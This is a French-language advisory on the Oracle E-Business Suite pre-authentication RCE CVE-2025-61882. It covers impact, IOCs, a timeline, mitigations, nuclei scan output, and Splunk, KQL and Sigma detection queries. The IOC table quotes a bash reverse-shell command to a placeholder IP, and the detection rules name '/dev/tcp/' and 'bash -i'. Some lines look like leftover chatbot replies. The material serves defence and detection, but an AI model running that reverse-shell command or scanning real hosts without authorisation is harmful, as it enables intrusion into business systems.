
Fournit un avis détaillé sur la CVE-2025-61882 avec une analyse technique, des IOC, des requêtes de détection et un modèle d'exploit basé sur nuclei pour la RCE pré-authentification d'Oracle E-Business Suite.
Résumé court : Exécution de code à distance critique sans authentification dans Oracle E‑Business Suite (EBS) — concerne les versions 12.2.3 → 12.2.14, CVSS 9.8, activement exploitée dans la nature (activité de rançongiciel/extorsion signalée). ([oracle.com][1])
| Champ | Détails |
|---|
| 🆔 CVE | CVE‑2025‑61882 |
| 🧾 Produit / Composant | Oracle E‑Business Suite (EBS) — intégration Concurrent Processing / BI Publisher |
| 📦 Versions concernées | 12.2.3 → 12.2.14 |
| 🔢 CVSS (v3.1) | 9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H) |
| ⚠️ Type | Exécution de code à distance (RCE) — aucune authentification requise |
| 🔥 Exploitée dans la nature | Oui — campagnes d'exploitation massive / d'extorsion signalées |
| 📅 Divulgation / chronologie | Octobre 2025 (avis du fournisseur + analyses publiques). ([oracle.com][1]) |
(Consolidé ci-dessus à partir de l'avis du fournisseur, NVD/CISA et de plusieurs analyses de fournisseurs.) ([oracle.com][1])
| Domaine d'impact | Ce que cela signifie |
|---|---|
| 🔓 Confidentialité | Les attaquants peuvent lire des données sensibles RH/finances/ERP |
| 🛠️ Intégrité | Les attaquants peuvent modifier des enregistrements, créer des backdoors ou altérer des configurations |
| ⚡ Disponibilité | Les attaquants peuvent perturber les services, exécuter un rançongiciel ou détruire les sauvegardes |
| 🧭 Niveau de risque | Extrême — RCE sans authentification sur un système ERP critique → possible pivot complet sur le domaine |
Références signalant une exploitation à fort impact et un lien avec le rançongiciel. ([Rapid7][2])
Oracle et les équipes de réponse aux incidents ont publié des IOC ; voici des exemples représentatifs signalés dans les avis et les analyses des fournisseurs. Recherchez ces modèles dans les journaux et les points de terminaison. ([oracle.com][1])
| Type | Exemple |
|---|---|
| 🌐 IP (observées) | 200.107.207.26, 185.181.60.11 (exemples d'adresses signalés) |
| 🧾 Modèle de commande | sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell) |
| 🗂️ Empreintes de fichiers | Plusieurs empreintes SHA‑256 pour des scripts d'exploitation suspects (voir l'avis du fournisseur pour la liste complète) |
| 🕳️ Artefacts | Web shells inattendus, nouvelles tâches cron, connexions sortantes suspectes vers des IP/ports inhabituels |
Si vous voulez la liste complète des IOC (IP, empreintes complètes, noms de fichiers), je peux la coller ici — dites « colle les IOC ». (Aucun lien.)
| Date | Événement |
|---|---|
| 9 août 2025 | Première activité d'exploitation réelle signalée (télémétrie du fournisseur). ([crowdstrike.com][4]) |
| Début octobre 2025 | Oracle a publié une alerte de sécurité / disponibilité des correctifs pour EBS. ([oracle.com][1]) |
| 6–7 octobre 2025 | CISA a ajouté la CVE à son catalogue Known Exploited Vulnerabilities (KEV) (directives pour les agences fédérales, date limite d'atténuation). ([cisa.gov][5]) |
| Octobre 2025 (en cours) | Plusieurs analyses de fournisseurs et rapports d'exploitation massive (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4]) |
| Priorité | Action | Notes / exemples spécifiques |
|---|---|---|
| 1️⃣ Critique | Corriger les instances EBS concernées | Appliquez immédiatement les correctifs de l'alerte de sécurité Oracle pour les versions 12.2.3–12.2.14. ([oracle.com][1]) |
| 2️⃣ Élevée | Isoler / restreindre l'accès aux points de terminaison web EBS | Bloquez le HTTP/HTTPS exposé à Internet vers EBS ; autorisez uniquement les IP d'administration de confiance ou le VPN. |
| 3️⃣ Élevée | Activer/ajuster les règles WAF | Déployez les signatures WAF du fournisseur/communauté pour les modèles d'exploitation ; bloquez les payloads suspects. ([Rapid7][2]) |
| 4️⃣ Élevée | Chasser & détecter | Recherchez dans les journaux les commandes de reverse shell, les écritures de fichiers anormales et les connexions sortantes vers les IOC. |
| 5️⃣ Incident | Contenir & répondre en cas de compromission | Isolez l'hôte, préservez les preuves forensiques, changez les identifiants, reconstruisez à partir de sauvegardes propres. |
| 6️⃣ Politique | Signaler & notifier | Si vous êtes soumis à des exigences réglementaires/contractuelles, notifiez les parties prenantes et les autorités conformément à la politique (les directives CISA/KEV peuvent s'appliquer). ([nvd.nist.gov][3]) |
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.


Splunk (recherche du modèle de reverse shell) :
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*")
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw
ELK / Kibana (KQL) :
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"
Règle Sigma (conceptuelle) :
title: Oracle EBS Reverse Shell via HTTP
detection:
selection:
EventID: 1234
ProcessCommandLine|contains: "/dev/tcp/"
condition: selection
(Adaptez les noms de champs à votre schéma de journaux ; utilisez les IOC pour affiner.)
80/443 vers les serveurs EBS depuis Internet public ; autorisez uniquement le VPN de gestion et les IP d'administration spécifiques.bash -i, /dev/tcp/, base64 -d ou des modèles de payload d'exploitation typiques dans les corps POST ou les paramètres d'URL.(Je liste les sources pour l'exactitude — je ne collerai pas de liens ici mais voici les noms des fournisseurs/autorités pour que vous puissiez les référencer si nécessaire.)
Les informations fournies dans ce rapport sont uniquement à des fins de sensibilisation, de défense et d'éducation. L'utilisation de ces informations pour exploiter, attaquer ou compromettre un système sans autorisation explicite est illégale et peut entraîner des sanctions pénales et civiles.
🔒 Appliquez toujours les correctifs recommandés, suivez les bonnes pratiques de sécurité et effectuez les tests uniquement dans des environnements contrôlés.
🧾 Ce rapport ne remplace pas les avis officiels des fournisseurs — consultez toujours les alertes de sécurité Oracle et les directives autorisées pour obtenir des instructions de remédiation définitives.